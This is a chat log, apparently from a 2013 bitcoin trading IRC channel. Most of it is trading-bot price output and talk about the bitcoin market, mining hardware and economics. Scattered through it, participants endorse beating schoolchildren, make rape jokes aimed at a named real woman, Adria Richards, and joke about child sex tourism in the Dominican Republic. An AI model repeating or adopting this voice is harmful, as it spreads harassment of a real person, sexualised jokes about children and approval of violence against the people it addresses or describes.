00:37:01 i am saying that the statistically expected benefit is degrees of magnitude under the statistically expected loss. Apr 08 00:37:19 as in, a 1 in 1000 shot at making 10% on your investment, and a 999 in 1000 shot at 90% loss of cvapital. Apr 08 00:37:31 of course Apr 08 00:37:42 ;;calc (1 * 1.1 + 999 * .1)/1000 Apr 08 00:37:43 0.101 Apr 08 00:37:58 if one invested in the idiots Apr 08 00:38:24 yeah. Apr 08 00:38:27 but individuals beat the markets all the time by developing expertise Apr 08 00:38:40 well, my expertise tells me this guy is lieing when he claims he had success. Apr 08 00:38:47 heh. Apr 08 00:38:49 like Apr 08 00:38:55 worked in the presence of accidental success? Apr 08 00:38:58 [MPEX] [S.MPOE] 16800 @ 0.00064551 = 10.8446 BTC [-] Apr 08 00:38:59 [MPEX] [S.MPOE] 1300 @ 0.00064501 = 0.8385 BTC [-] Apr 08 00:39:01 ok, that i can buy. Apr 08 00:39:01 [MPEX] [S.MPOE] 700 @ 0.00064063 = 0.4484 BTC [-] Apr 08 00:39:25 individuals can learn a lot by seeing things happen. humans experience the world and evolce. Apr 08 00:39:41 seeing requires a relatively clean lens. Apr 08 00:39:41 evolve*. not that many *do* obviously, but it happens. Apr 08 00:39:59 a clean lens is not necessarily a requirement for success. Apr 08 00:40:02 people who imagine they're being entrepreneurs and in general doods preocupied with posturing and maintaining apparences Apr 08 00:40:05 rarely learn anything. Apr 08 00:40:32 but the individuals they mock look very similar to them. Apr 08 00:40:43 ya well... Apr 08 00:41:03 i wish i could meet the guy Apr 08 00:41:19 mostly because i'm trying to develop expertise in the evaluating of people thing Apr 08 00:41:40 what sorts of things do you invest in, mircea_popescu? Apr 08 00:42:47 anything that makes sense Apr 08 00:43:00 [HAVELOCK] [SDICE] 1 @ 0.29 BTC [-] Apr 08 00:43:02 [HAVELOCK] [SDICE] 1 @ 0.28 BTC [-] Apr 08 00:43:02 [HAVELOCK] [SDICE] 2 @ 0.276 = 0.552 BTC [-] Apr 08 00:43:03 [HAVELOCK] [SDICE] 3 @ 0.2716 = 0.8148 BTC [-] Apr 08 00:43:23 ugh there is a video about him Apr 08 00:43:27 ;;ticker Apr 08 00:43:31 BTCUSD ticker | Best bid: 164.10000, Best ask: 164.89994, Bid-ask spread: 0.79994, Last trade: 164.10000, 24 hour volume: 57855.56993253, 24 hour low: 142.51000, 24 hour high: 164.90000, 24 hour vwap: 153.31309 Apr 08 00:44:41 and here i was being nervous about 164 call... Apr 08 00:44:42 lol Apr 08 00:46:06 Learn to do the opposite of what you feel ; Apr 08 00:46:13 can always go down Apr 08 00:46:20 both are true Apr 08 00:47:00 that's why I got the 164 calls in the first place...calls haven't let down so far Apr 08 00:47:00 [HAVELOCK] [HIM] 1 @ 1.93 BTC [+] Apr 08 00:47:21 It will go down, but when.. Apr 08 00:48:54 Hence a strategy with calls, puts and holding in a combination that makes sense no matter what happens Apr 08 00:50:07 in other news, http://polimedia.us/dtng/c/src/136490667277.jpg Apr 08 00:51:08 You cheeky cheeky Apr 08 00:51:43 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Apr 08 00:54:40 [BTCTC] [GSDPT] 14 @ 0.00338 = 0.0473 BTC [+] Apr 08 00:56:35 mircea_popescu: nice Apr 08 00:56:42 $avg Apr 08 00:56:44 thestringpuller: 152.20 Apr 08 00:57:18 mircea_popescu: I feel as though you are an opponent to education because of the tendency for the young's reluctance to "listen" Apr 08 00:57:53 i'm an opponent to free education, and also to nonviolent education. Apr 08 00:58:18 if you only educate about half the kids, and beat the shit out of about half of those it works nicely. Apr 08 00:59:02 yes, you would use corporal punishment on individuals, they get 4 lashes everytime they tell you the integral of 2X is X^2 instead of X^2+C Apr 08 00:59:16 :P Apr 08 00:59:35 lol Apr 08 01:01:24 nah. Apr 08 01:01:47 they get dunked into the riever every time they say "I feel what the author really means" Apr 08 01:02:47 bitcoin-central.net pretty much died.. spread 80-120 eur Apr 08 01:02:59 jurov not open for trading yet is it ? Apr 08 01:03:03 jurov: wha? Apr 08 01:03:22 Its open tomorrow Apr 08 01:03:35 Its read only now Apr 08 01:03:38 [BTCTC] [ASICMINER-PT] 1 @ 0.7827 BTC [+] Apr 08 01:03:49 ah ic Apr 08 01:04:12 did the coinlab deal with mtgox fall through? Apr 08 01:04:12 With orders close to mkt price cancelled Apr 08 01:04:44 On Sunday, April 7th at 11:00PM CET/Paris Time, full trading will resume with the ability to create and cancel buy and sell orders. Apr 08 01:05:09 Fair enough Apr 08 01:05:25 so at least orders could be able to get placed now Apr 08 01:05:43 or in a hour Apr 08 01:05:58 ya something like that. Apr 08 01:06:02 Its passed already 11h Apr 08 01:06:39 Good night! We survived another day in bitcoin land Apr 08 01:07:06 So we're lookin at 175-180 tomorrow it seems Apr 08 01:07:26 lol i'm actually in the same timezone.. just confused by summertime Apr 08 01:08:43 ;;asks 179.99 Apr 08 01:08:45 There are currently 6231.4017 bitcoins offered at or under 179.99 USD, worth 1061300.05165 USD in total. | Data vintage: 0.0015 seconds Apr 08 01:13:14 its crazy to see all the tiny amounts of bitcoin i have left across the web Apr 08 01:13:25 different mining pools and exchanges Apr 08 01:13:44 i think they may need to lower the sending threshhold eventually Apr 08 01:15:00 [HAVELOCK] [VTX] 2 @ 0.407 = 0.814 BTC [-] Apr 08 01:15:28 !ticker havelock him Apr 08 01:15:29 [HAVELOCK:HIM] 1D: 1.82000000 / 1.84970968 / 1.93000000 (31 shares, 57.34100000 BTC), 7D: 1.82000000 / 1.90441977 / 2.06000000 (86 shares, 163.78010000 BTC), 30D: 1.41000000 / 1.85548093 / 2.08000000 (682 shares, 1265.43799220 BTC) Apr 08 01:16:29 http://trilema.com/2013/rape-is-fun-or-lets-fuck-up-adria-richards/#comment-92655 Apr 08 01:16:32 we have winners. Apr 08 01:20:00 [HAVELOCK] [SDICE] 1 @ 0.30999999 BTC [+] Apr 08 01:26:53 okay mircea_popescu is officially the rubber band man Apr 08 01:27:00 img macro to ensue Apr 08 01:30:28 i kinda wish you and vexare had continued in english Apr 08 01:30:33 it was starting to look interesting Apr 08 01:30:38 [BTCTC] [ASICMINER-PT] 1 @ 0.7888 BTC [+] Apr 08 01:31:00 [BTCTC] [ASICMINER-PT] 6 @ 0.7889 = 4.7334 BTC [+] Apr 08 01:31:36 [BTCTC] [BASIC-MINING] 10 @ 0.4 = 4 BTC [+] Apr 08 01:31:38 i was just telling him off. Apr 08 01:31:54 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [+] Apr 08 01:31:59 [HAVELOCK] [VTX] 2 @ 0.40888888 = 0.8178 BTC [+] Apr 08 01:32:12 english just doesn't deliver under the telling off rubric. Apr 08 01:32:17 [BTCTC] [ASICMINER-PT] 1 @ 0.7889 BTC [+] Apr 08 01:33:00 nice Apr 08 01:33:42 [BTCTC] [S.DICE-PT] 63 @ 0.0042 = 0.2646 BTC [-] Apr 08 01:36:28 mircea, deposits please :) Apr 08 01:38:59 ;;goxlag Apr 08 01:39:00 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 08 01:40:02 it could have said something about sending bitcoins via quantum entanglement Apr 08 01:43:26 jurov you know i don't highlight on mircea Apr 08 01:43:44 yea it's not *so* urgent Apr 08 01:44:01 haha k Apr 08 01:44:33 rape adria Apr 08 01:50:29 http://trilema.com/2013/the-bitcoiners-press-manual/#comment-92651 Apr 08 01:50:59 ^^^ deep metaphysical discussion culminated by wisdom "for mating purposes, world population count doesn't matter" Apr 08 01:51:31 jurov: lol Apr 08 01:51:57 and everything else is akin to mating anyway Apr 08 01:52:04 isn't it ? Apr 08 01:52:16 undecided on it Apr 08 01:52:31 so it IS deep metaphysical discussion :D Apr 08 01:52:39 indeed Apr 08 02:00:02 lol http://epetitions.direct.gov.uk/petitions/34781 Apr 08 02:01:24 I say old chap. Down with this sort of thing! Apr 08 02:01:50 Responsible department: Department for Culture, Media and Sport Apr 08 02:01:51 totally. Apr 08 02:02:17 http://www.emmaharriett.co.uk/ ? Apr 08 02:03:01 dunno https://twitter.com/EmmaHarriett too was looking for bitcoin references Apr 08 02:03:46 http://www.castingcallpro.com/uk/view.php?uid=377118 Apr 08 02:03:47 can Apr 08 02:03:52 't be a 30yo acress chick can it ?! Apr 08 02:03:56 comes accross like your typical limey toff Apr 08 02:04:19 mircea_popescu: what does BCB stand for? Apr 08 02:04:43 bitcoin central bank Apr 08 02:04:52 is that like a joke? Apr 08 02:05:02 sort-of Apr 08 02:05:18 dub more like the typical unmaffy muff. Apr 08 02:05:21 is that the forum/otc masturbator? Apr 08 02:05:35 I honestly cannot tell if he's a troll or not Apr 08 02:06:44 un-maffy ie didn't learn to multiply past 5 Apr 08 02:06:51 and muff as in, bird. Apr 08 02:09:27 http://www.satoshi-karoshi.com/?r=9059 Apr 08 02:11:01 pretty sure that has a virus Apr 08 02:12:20 no its a gambling site Apr 08 02:12:27 lol Apr 08 02:12:36 :D Apr 08 02:12:40 make up to 17x your bet, its easy, game Apr 08 02:12:56 I'd rather gamble on the market Apr 08 02:12:58 it's easy, game! Apr 08 02:13:15 finally an easy, game! Apr 08 02:16:56 its an interesting idea for a game Apr 08 02:19:56 im only interested in one game Apr 08 02:22:41 I find browsing the net from american IPs quite unsettling Apr 08 02:23:31 what's different? Apr 08 02:23:43 the ad bubble has a palpable craziness to it Apr 08 02:23:56 bubble of advertising companies? Apr 08 02:24:04 targeted advertising Apr 08 02:24:08 oh oh Apr 08 02:24:18 "this one trick" etc? Apr 08 02:24:52 from my home space I get adds for international travel, hotels and insurance Apr 08 02:25:53 via US I get offers of 'shocking footage' about chinese gold hoarding, anit-obama liberal agenda shit and emergency supplies Apr 08 02:26:48 i can attest us adverising was always insane Apr 08 02:26:50 two anti-obama ads no less Apr 08 02:27:04 in the 90s they were shockingly insane for the european mind Apr 08 02:29:17 this is for a website sample size of one admittedly Apr 08 02:30:13 [BTCTC] [ASICMINER-PT] 1 @ 0.7888 BTC [-] Apr 08 02:30:51 [BTCTC] [ASICMINER-PT] 4 @ 0.7889 = 3.1556 BTC [+] Apr 08 02:31:11 [BTCTC] [ASICMINER-PT] 1 @ 0.789 BTC [+] Apr 08 02:45:23 mircea_popescu so the BCB is the bitcoin illuminati Apr 08 02:45:24 that's pretty cool Apr 08 02:50:37 !ticker ^OIX Apr 08 02:50:38 Shit. You ain't even old enough to smoke. Apr 08 02:50:40 !ticker m ^OIX Apr 08 02:50:41 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 109.52216404 / 136.8194837 / 153.12818005 (23843 shares, 5,904.78 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 08 02:52:19 anyone know a good way to track bitcoin activity in kinda small areas Apr 08 02:52:27 specifically the dominican republic Apr 08 02:55:06 [BTCTC] [B.YABMC] 1 @ 0.01797 BTC [-] Apr 08 02:55:13 [BTCTC] [B.YABMC] 1 @ 0.01797 BTC [-] Apr 08 02:55:38 [BTCTC] [B.YABMC] 1 @ 0.017979 BTC [+] Apr 08 02:57:24 DR is a big kiddy sex tourism place, expect bitcoin to be popular Apr 08 02:58:02 buy / bribe data from exchanges ? Apr 08 02:58:13 lol Apr 08 02:58:24 its just close to the US, and I have some family there Apr 08 02:58:46 surely Bruce Wagner has a network there, offer up somelittle boy butt Apr 08 02:59:34 its a popular place for the NANOG conf for above reasons Apr 08 03:00:53 NANOG? Apr 08 03:01:11 is that nambla from south park? Apr 08 03:01:18 over 160 USD/BTC... Apr 08 03:01:24 where is the end to all this? Apr 08 03:01:48 no end Apr 08 03:02:26 Oh wow. this picture won something Apr 08 03:02:27 http://polimedia.us/dtng/c/src/136402734766.jpg Apr 08 03:02:28 [BTCTC] [BITVPS] 1 @ 0.00151 BTC [-] Apr 08 03:02:30 [BTCTC] [BITVPS] 2 @ 0.00151 = 0.003 BTC [-] Apr 08 03:02:33 [BTCTC] [BITVPS] 500 @ 0.0015 = 0.75 BTC [-] Apr 08 03:04:21 !ticker b bitvps Apr 08 03:04:21 Quest for vision is a great blessing. Apr 08 03:04:27 !ticker btctc bitvps Apr 08 03:04:29 [BTCT:BITVPS] 1D: 0.00131 / 0.00153 / 0.0025 (521 shares, 0.8 BTC), 7D: 0.00131 / 0.00221 / 0.00637 (3082 shares, 6.8 BTC), 30D: 0.00131 / 0.00311 / 0.00689 (4682 shares, 14.6 BTC) Apr 08 03:07:52 [BTCTC] [ASICMINER-PT] 1 @ 0.78997 BTC [+] Apr 08 03:13:42 [MPEX] [S.MPOE] 5552 @ 0.0006474 = 3.5944 BTC [+] Apr 08 03:13:52 [BTCTC] [ASICMINER-PT] 10 @ 0.78997 = 7.8997 BTC [+] Apr 08 03:14:09 oh wow S.MPOE plummetted again Apr 08 03:14:15 !ticker m S.MPOE Apr 08 03:14:15 [MPEX:S.MPOE] 1D: 0.00064063 / 0.00065874 / 0.00070715 (216398 shares, 142.55 BTC), 7D: 0.00059218 / 0.00067314 / 0.00071514 (1740073 shares, 1,171.32 BTC), 30D: 0.00059218 / 0.00069061 / 0.00077505 (8844010 shares, 6,107.81 BTC) Apr 08 03:14:22 ;;seen burnside Apr 08 03:14:22 burnside was last seen in #bitcoin-assets 2 days, 2 hours, 18 minutes, and 23 seconds ago: not sure what'cha mean. (286 remember.) Apr 08 03:17:26 [BTCTC] [S.DICE-PT] 19 @ 0.0042 = 0.0798 BTC [-] Apr 08 03:18:39 ;;ticker Apr 08 03:18:40 BTCUSD ticker | Best bid: 163.83639, Best ask: 163.89000, Bid-ask spread: 0.05361, Last trade: 163.89000, 24 hour volume: 60953.30417683, 24 hour low: 142.70000, 24 hour high: 164.90000, 24 hour vwap: 154.33445 Apr 08 03:25:01 Just saw the author name on a Wordpress Plugin in one of my client's sites "Ciprian Popescu" Apr 08 03:25:27 Romanians have cool first names Apr 08 03:25:37 or is the first name the last? Apr 08 03:26:01 Ah, i didnt win anything from the rape contest. shoulda paid more attention to photoshop class lol Apr 08 03:26:09 [BTCTC] [ASICMINER-PT] 30 @ 0.78997 = 23.6991 BTC [+] Apr 08 03:28:15 [BTCTC] [BTC-BOND] 1 @ 0.009916 BTC [-] Apr 08 03:29:34 [BTCTC] [ASICMINER-PT] 2 @ 0.78997 = 1.5799 BTC [+] Apr 08 03:30:54 [BTCTC] [BTC-BOND] 98 @ 0.01 = 0.98 BTC [+] Apr 08 03:31:17 Any BTC-BOND holders? Apr 08 03:32:52 what is btc-bond? Apr 08 03:34:00 oh that Apr 08 03:35:02 closing it out Nam? Apr 08 03:36:14 Well at least partially... Apr 08 03:36:24 has it grown at all Apr 08 03:36:37 lol Emma Harriet Apr 08 03:36:40 It went down from 0.09 BTC daily to 0.06 daily in interest, about 1/3rd already bought back Apr 08 03:36:42 what a troll Apr 08 03:37:02 o looky mircea_popescu https://bitcointalk.org/index.php?topic=170007.0 Apr 08 03:37:09 but with BTC price increase, that 0.06 is still 10 USD daily. Apr 08 03:37:53 "Pachter thinks that could increase to 100 million nights "eventually"—at which point it could be generating $1 billion a year in revenues. Apr 08 03:38:06 really business insider is the most ignorant piece of shit out there. Apr 08 03:38:11 sorta like bitcoin magazine for fiat. Apr 08 03:39:05 Let's just say that the debt in USD value is already at 35k USD which I'd be quite hard pressed to be able to purchase that much in BTC. I have over half that in free BTC and much more in BTC assets however. Apr 08 03:39:28 Would just like to close a part of it before anything happens to my BTC investments. Better be safe than have to default if everything goes bust. Apr 08 03:39:36 mircea_popescu i used AirBNB to throw a party Apr 08 03:39:47 I made like a 1000 bucks easy Apr 08 03:39:48 lol Apr 08 03:39:48 [MPEX] [S.DICE] 250 @ 0.00301846 = 0.7546 BTC [-] Apr 08 03:40:15 heh okay. Apr 08 03:40:42 it's good for venue finding, but it's bubble-fied unfortunately Apr 08 03:40:45 like kickstarter :P Apr 08 03:44:57 [BTCTC] [ASICMINER-PT] 1 @ 0.78997 BTC [+] Apr 08 03:45:46 ohoho! https://bitcointalk.org/index.php?topic=170003.0 Apr 08 03:46:21 even has a yt vid. **** BEGIN LOGGING AT Mon Apr 8 12:42:32 2013 Apr 08 12:42:51 genie is out of the bottle Apr 08 12:43:19 you can introduce FUD and price manipulations, but the idea is solid...scared people go back to fiat and we get more btc Apr 08 12:44:04 ;;ticker Apr 08 12:44:05 BTCUSD ticker | Best bid: 185.50001, Best ask: 186.00000, Bid-ask spread: 0.49999, Last trade: 186.00000, 24 hour volume: 85340.97056825, 24 hour low: 147.01000, 24 hour high: 186.50000, 24 hour vwap: 163.95404 Apr 08 12:44:08 o hey Apr 08 12:44:15 yeah insanity Apr 08 12:44:45 [BTCTC] [BITVPS] 2 @ 0.00101 = 0.002 BTC [-] Apr 08 12:45:37 but bgupta, my point was that there are fundamentals to back this up...actual bitcoin transactions for goods is up quite a bit, and we are just getting big enough to attract real attention from big fish, this is what i think happens today and this week... Apr 08 12:46:39 yeah I know, but last I heard "commerce" at least on the silk road side was like 12 million per month.. how much larger is other commerce.. Apr 08 12:46:46 err 21 million i mean Apr 08 12:46:56 at this point sellers should be able to realize that selling into bids is dumb, people will obv pay any price Apr 08 12:47:06 guesin SR is becoming a smaller and smaller portion of market Apr 08 12:47:07 just wait 10min Apr 08 12:47:13 the $5M (bitpay) is not all that exciting, walletbit what are they turning over ? Apr 08 12:47:32 the $5 million from bitpay is exciting to me somewhat Apr 08 12:47:34 SR is also higher and higher risk to use Apr 08 12:48:00 we will need services like that until bitcoin gets big enough to basically float its own supply chain Apr 08 12:48:06 ;;bids 177 Apr 08 12:48:08 in the context of a '2 billion' market cap ? Apr 08 12:48:08 There are currently 1773.1748 bitcoins demanded at or over 177.0 USD, worth 319289.445178 USD in total. | Data vintage: 0.0053 seconds Apr 08 12:48:11 i have no idea why people still reference sr when discussing bitcoin commerce. Apr 08 12:48:15 ;;bids 170 Apr 08 12:48:15 There are currently 3867.5297 bitcoins demanded at or over 170.0 USD, worth 680880.802151 USD in total. | Data vintage: 7.4171 seconds Apr 08 12:48:20 seriously : it's a vanishinghly small irrelevant %. Apr 08 12:48:29 ;;asks 190 Apr 08 12:48:29 There are currently 3370.0377 bitcoins offered at or under 190.0 USD, worth 635943.092935 USD in total. | Data vintage: 20.7609 seconds Apr 08 12:48:36 [MPEX] [S.DICE] 2000 @ 0.00301 = 6.02 BTC [+] Apr 08 12:48:47 ;;asks 200 Apr 08 12:48:47 There are currently 9568.7331 bitcoins offered at or under 200.0 USD, worth 1852022.32504 USD in total. | Data vintage: 38.8006 seconds Apr 08 12:48:53 yes, but those numbers were not from a 2 billion dollar economy...they were from a <1 billion economy Apr 08 12:49:06 does no one remember where we started march? Apr 08 12:49:17 i know it moves quick... Apr 08 12:49:21 40? Apr 08 12:49:24 25 Apr 08 12:49:28 mircea_popescu: actually because it is mentioned quite a bit in press.. being more informed, what is the majority of the goods and services being exchanged via btc? Apr 08 12:49:37 anyway, the confusion between "fiat value of M3" amnd "economy" is grave. Apr 08 12:49:50 bitcoin economy is not worth x because total aggregate btc "would be". Apr 08 12:50:00 first off, you could never sell 11mn btc at 180 each. Apr 08 12:50:03 [MPEX] [O.USD.C143T] 40 @ 0.275176 = 11.007 BTC [+] Apr 08 12:50:14 ;;bids 0 Apr 08 12:50:16 There are currently 31401663 bitcoins demanded at or over 0.0 USD, worth 11542581.0758 USD in total. | Data vintage: 0.0106 seconds Apr 08 12:50:18 bgupta ya but seriously, the press is horrible for information. Apr 08 12:50:27 yes of course Apr 08 12:50:27 i have an old graph somewhere, want me to dig it up ? Apr 08 12:50:44 graph of how people are "spending" btc? Apr 08 12:51:01 of the economic uses of btc. Apr 08 12:51:13 sure sounds great. Apr 08 12:51:16 thank you Apr 08 12:51:32 http://trilema.com/2012/what-are-the-bitcoin-market-drivers/ Apr 08 12:51:45 meanwhile i would say the small things lost share and the larger things gained. Apr 08 12:51:51 new sexy pic! Apr 08 12:51:56 hehe Apr 08 12:54:18 japan makes it super easy to see what happens...yen multi-year low, nikkei up 2% Apr 08 12:56:07 so I guess the arguement is it can exist largely as an SoV?, as long as it's tradable into fiat, and other goods services? Apr 08 12:56:20 (Making sure I am taking away the correct message from post) Apr 08 12:56:30 That big slices are getting bigger Apr 08 12:56:45 and biggest slice at the time of writing was SoV? Apr 08 12:57:47 well that was my biggest point about a magic money machine, i would gladly throw all of my paychecks into btc and hold them, if i could spend them freely without worrying about ACH transfer times, etc Apr 08 12:57:53 its gold with all of the conveniences of e-transacting Apr 08 12:58:02 and more Apr 08 12:58:10 ThickAsThieves: ^^ THIS Apr 08 12:58:28 why can't it just be bitcoin Apr 08 12:58:42 it is, dont worry Apr 08 12:59:06 all the analogies and metaphors are slightly tiring Apr 08 13:00:19 then perk us up socrates Apr 08 13:04:03 ;;asks 999999999 Apr 08 13:04:05 There are currently 37404.385 bitcoins offered at or under 999999999.0 USD, worth 3021267941.74 USD in total. | Data vintage: 0.0018 seconds Apr 08 13:04:07 bgupta it sure can exist largely as sov. Apr 08 13:04:22 that is a service. like insurance, or stripping. Apr 08 13:04:55 punkman ya well... without words there's what ? faith ? Apr 08 13:05:29 jurov : http://trilema.com/2012/lets-dig-a-little-deeper-into-this-entire-deflation-problem/#comment-92664 Apr 08 13:05:33 maybe you get a kick out of that. Apr 08 13:05:37 there are roughly 37% less bitcoins for sale today than last week Apr 08 13:06:43 37% is roughly how much the price has risen i bet too Apr 08 13:07:01 i think we were at about 59000 coins at 140 Apr 08 13:07:09 mircea_popescu: of course, but how many times do we have to compare something to gold and fiat and whatnot Apr 08 13:07:39 no more times, just for you punkman Apr 08 13:07:42 we're roughly in the situation where we're flooded with noobs. what's to do ;/ Apr 08 13:07:44 this is more directed to all the idiots writing about bitcoin, not ThickAsThieves Apr 08 13:07:53 repeat history 101 and economics 101 tioll our heads fall off Apr 08 13:08:09 its also just us spinning our wheels Apr 08 13:08:13 we get excited Apr 08 13:08:15 and wanna gab Apr 08 13:08:42 plenty of conversations in here can be a real chore to witness Apr 08 13:08:51 still a great chan Apr 08 13:09:00 SO what is the difference between a violent upward correction and a bubble/ponzi? Apr 08 13:09:25 the bag still has value when it pops Apr 08 13:09:33 got it.. Apr 08 13:09:35 [MPEX] [S.DICE] 500 @ 0.0028 = 1.4 BTC [-] Apr 08 13:10:39 bgupta bitcoin retraced when ordered to. Apr 08 13:10:50 i submit the 3-6april 4 day interval qwould have killed a ponzi. Apr 08 13:12:50 was trying to figure out how to transfer most of my savings into btc (as SoV).. but decided if I just wait a few years, most of my assets will be in btc if I do nothing. (Not sure if that was clear) Apr 08 13:13:00 it is clear. Apr 08 13:13:09 most everybody spends fiat, saves btc, passively moving over. Apr 08 13:13:21 this is, of course, bad money driving good money out. Apr 08 13:13:33 yep Apr 08 13:13:38 gresham's law Apr 08 13:14:02 [BTCTC] [ASICMINER-PT] 1 @ 0.7722 BTC [-] Apr 08 13:14:05 [BTCTC] [ASICMINER-PT] 1 @ 0.7722 BTC [-] Apr 08 13:14:07 [BTCTC] [ASICMINER-PT] 1 @ 0.7722 BTC [-] Apr 08 13:14:36 [BTCTC] [ASICMINER-PT] 1 @ 0.762 BTC [-] Apr 08 13:14:50 oh damn greshman's law is great.. never read it before. Apr 08 13:15:03 ... Apr 08 13:15:05 [BTCTC] [ASICMINER-PT] 2 @ 0.761 = 1.522 BTC [-] Apr 08 13:15:08 are you serious ?! Apr 08 13:15:18 sorry, yeah Apr 08 13:15:22 lol, people only reference it every day Apr 08 13:15:24 see punkman, THIS is why. because people miss a spot shaving. it happens. it's what it is. Apr 08 13:15:27 not your fault Apr 08 13:15:37 [BTCTC] [ASICMINER-PT] 1 @ 0.7606 BTC [-] Apr 08 13:15:56 i literally almost didn't mention it this time, because i figured everyone would be like "oh no, not gresham's law again, we all know asshole" Apr 08 13:16:05 [BTCTC] [ASICMINER-PT] 10 @ 0.77 = 7.7 BTC [+] Apr 08 13:16:07 [BTCTC] [ASICMINER-PT] 8 @ 0.7605 = 6.084 BTC [-] Apr 08 13:16:10 [BTCTC] [ASICMINER-PT] 2 @ 0.7605 = 1.521 BTC [-] Apr 08 13:16:19 [BTCTC] [ASICMINER-PT] 1 @ 0.7944 BTC [+] Apr 08 13:16:26 [BTCTC] [ASICMINER-PT] 2 @ 0.7944 = 1.5888 BTC [+] Apr 08 13:16:47 [BTCTC] [ASICMINER-PT] 10 @ 0.7605 = 7.605 BTC [-] Apr 08 13:16:49 well many of you guys have been in channel for months if not years.. I'm realatively new.. Apr 08 13:16:56 mircea_popescu: what do you think of asicminer? Apr 08 13:17:07 bgupta: yeah, definitely not your fault Apr 08 13:17:18 [BTCTC] [ASICMINER-PT] 1 @ 0.7602 BTC [-] Apr 08 13:17:19 [BTCTC] [ASICMINER-PT] 1 @ 0.7601 BTC [-] Apr 08 13:17:25 I am an engineer by profession, not economist. Apr 08 13:17:29 bgupta don't feel bad about it. it happens Apr 08 13:17:35 hehehe, that is part of the fun of bitcoins Apr 08 13:17:37 nobody knows what they don't know till they find out. Apr 08 13:17:40 learning about the system of the world Apr 08 13:17:44 exactly Apr 08 13:17:55 [BTCTC] [ASICMINER-PT] 5 @ 0.761 = 3.805 BTC [+] Apr 08 13:17:58 [BTCTC] [ASICMINER-PT] 6 @ 0.76 = 4.56 BTC [-] Apr 08 13:17:59 MJR_ i think both ways. Apr 08 13:18:26 mircea_popescu: i'm working on a blog... plan on juxtaposing the tower of babel with bitcoin...money as speech etc Apr 08 13:18:28 the main concern is they made a really shitty set of chips which keep blowing up under load, after 100 hours or w/e, and are currently halfway through batch two because of this. Apr 08 13:18:36 I know just enough to know I don't know shit Apr 08 13:18:36 otherwise, they have a solid business model. Apr 08 13:18:46 I've heard of some of the example's like metal content exceeding face value and no matter what gov't laws go into place they will get scrapped. Apr 08 13:19:34 mircea_popescu: yeah, i like the business model, i'm working on an fpga design that should be more efficient, and can then do an avalon style chip maybe...as far as i have seen, the designs work, but that doesn't mean they are nearly on the level they could be Apr 08 13:19:59 more competition in mining is great. Apr 08 13:20:11 at the current price there;'s a fat paycheck to be eaten there. Apr 08 13:20:16 wth Apr 08 13:20:22 (which is what i meant earlier. sov AND MINING grew lots) Apr 08 13:20:24 apparently bfl delivered to someone in australia? Apr 08 13:20:28 orly ? Apr 08 13:20:28 yes, true, and there will be another wave of hardware that makes current asics look like old fpga's... Apr 08 13:20:31 i was just talking to some guy on the phone Apr 08 13:20:47 that cant be right Apr 08 13:20:48 hmmm...did this one have fans? Apr 08 13:21:01 apparently pre ordered 2 months ago Apr 08 13:21:04 brb Apr 08 13:21:10 bastard Apr 08 13:21:10 ya srslty. fans or no fans ? Apr 08 13:21:19 i dont know Apr 08 13:21:23 ask Apr 08 13:21:32 i wasn't talking to him directly, my friend was talking to him for me heh Apr 08 13:22:08 hes off to bed but they're calling me tomorrow night Apr 08 13:22:10 i cant believe it Apr 08 13:23:17 mining litecoin is still more profitable then btc Apr 08 13:23:28 than* Apr 08 13:23:39 i'm not really believing it either. Apr 08 13:24:10 LTC is interesting, but it just took off on the back of BTC now Apr 08 13:25:17 I like that a new altcoin is popping up every other week now Apr 08 13:26:06 it will make the ltc bubble burst a lot more digestible. Apr 08 13:26:11 sorry i know i usually troll but im very serious about this one Apr 08 13:26:18 trying to get him to ask the guy to take a picture and send it Apr 08 13:26:52 it was just a random phone call 30mins ago Apr 08 13:26:54 http://rlv.zcache.com/i_love_vaporware_mesh_hats-ra52a04ca77754b67a848ac0e607cb30d_v9wfy_8byvr_512.jpg Apr 08 13:27:03 cause my friend knows i'm into bitcoin and that Apr 08 13:27:12 just got a fresh hyacinth. Apr 08 13:27:16 it smells good :D Apr 08 13:30:39 ;;ticker Apr 08 13:30:40 BTCUSD ticker | Best bid: 180.37700, Best ask: 182.70000, Bid-ask spread: 2.32300, Last trade: 180.00001, 24 hour volume: 85165.12407777, 24 hour low: 147.62000, 24 hour high: 186.50000, 24 hour vwap: 164.94921 Apr 08 13:31:48 is hyacith the same as honeysuckle? Apr 08 13:33:33 guess it's not, i love those scents though Apr 08 13:34:04 a no Apr 08 13:34:20 those two and gardenia Apr 08 13:34:26 honeysuckle is a bush, hyacinth is a bulb, early srping Apr 08 13:35:20 that cap punkman :PP Apr 08 13:35:23 yes, true Apr 08 13:35:54 cherry blossoms will be blooming soon...its one of my favorite times to enjoy nature Apr 08 13:38:49 ;;seen smickles Apr 08 13:38:49 smickles was last seen in #bitcoin-assets 3 days, 18 hours, 56 minutes, and 15 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 08 13:49:33 ;;ticker Apr 08 13:49:34 BTCUSD ticker | Best bid: 182.04000, Best ask: 182.45899, Bid-ask spread: 0.41899, Last trade: 182.04000, 24 hour volume: 88143.75258705, 24 hour low: 148.01000, 24 hour high: 186.50000, 24 hour vwap: 165.56880 Apr 08 13:54:52 [BTCTC] [BTC-GOLD] 1 @ 0.01 BTC [+] Apr 08 14:03:02 [MPEX] [S.MPOE] 14110 @ 0.00065788 = 9.2827 BTC [+] Apr 08 14:03:04 [MPEX] [S.MPOE] 1300 @ 0.00065871 = 0.8563 BTC [+] Apr 08 14:03:11 [MPEX] [S.MPOE] 640 @ 0.00065872 = 0.4216 BTC [+] Apr 08 14:12:24 http://bitbet.us/bet/376/bfl-will-stop-giving-refunds-on-bitforce-sc/ Apr 08 14:12:36 this is interesting. 500:1 implicit odds that bfl stops refunds. Apr 08 14:15:20 i'm surprised people arent accusing BFL of mining with theri chips instead of shipping Apr 08 14:15:58 [MPEX] [S.MPOE] 700 @ 0.00065356 = 0.4575 BTC [-] Apr 08 14:16:38 i guerss that clearly shows how much faith in the bfl chip there is. Apr 08 14:17:55 they must be mining by now Apr 08 14:18:31 ;;nethash Apr 08 14:18:31 61113.2878525 Apr 08 14:18:45 ;;estimate Apr 08 14:18:46 